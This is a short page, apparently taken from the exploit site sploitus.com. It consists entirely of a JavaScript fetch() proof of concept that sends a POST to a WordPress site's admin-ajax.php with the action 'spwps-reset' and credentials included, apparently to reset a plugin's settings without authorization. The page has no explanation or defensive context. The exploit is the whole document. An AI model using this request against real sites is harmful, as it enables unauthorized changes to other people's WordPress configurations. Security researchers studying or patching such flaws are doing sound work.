Share
## https://sploitus.com/exploit?id=WPEX-ID:777D4637-444B-4EDA-BC21-95D3A3BF6CD3
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=spwps-reset&unique=template",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));